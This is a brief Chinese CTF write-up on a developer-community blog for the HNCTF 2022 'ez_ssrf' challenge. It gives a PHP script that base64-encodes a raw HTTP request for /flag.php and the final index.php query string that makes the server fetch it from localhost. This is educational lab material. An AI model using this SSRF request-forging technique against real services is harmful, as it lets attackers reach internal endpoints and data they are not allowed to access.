AI 助理
备案控制台
开发者社区 云计算 文章 正文

NSS [HNCTF 2022 WEEK2]ez_ssrf

2024-08-14 30
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: NSS [HNCTF 2022 WEEK2]ez_ssrf

NSS [HNCTF 2022 WEEK2]ez_ssrf

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80


传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

Jay17
目录
相关文章
游客qeoynko2nmbgk
|
28天前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
游客qeoynko2nmbgk
15 3
游客qeoynko2nmbgk
|
29天前
|
安全 Windows
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
游客qeoynko2nmbgk
13 2
Jay17
|
2月前
|
Java
NSS [NSSRound#7 Team]ec_RCE
NSS [NSSRound#7 Team]ec_RCE
Jay17
36 0
Jay17
|
2月前
|
应用服务中间件 PHP nginx
NSS [HNCTF 2022 WEEK2]easy_include
NSS [HNCTF 2022 WEEK2]easy_include
Jay17
35 0
simplify0
|
5月前
rock rv1126buildroot增加ntp过程
rock rv1126buildroot增加ntp过程
simplify0
209 0
Myon
|
10月前
|
SQL 关系型数据库 MySQL
NSS LitCTF部分wp
NSS LitCTF部分wp
Myon
48 0
余二五
|
Unix Shell
slackware13.37 下安装NS-2
余二五
1065 0
技术小美
|
Shell PHP
Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
技术小美
1099 0
桃子红了呐
|
PHP iOS开发 MacOS
Plugging mcrypt into PHP, on Mac OS X Snow Leopard 10.6.1[转]
桃子红了呐
666 0
技术小胖子
|
存储 安全
nss pam
技术小胖子
1163 0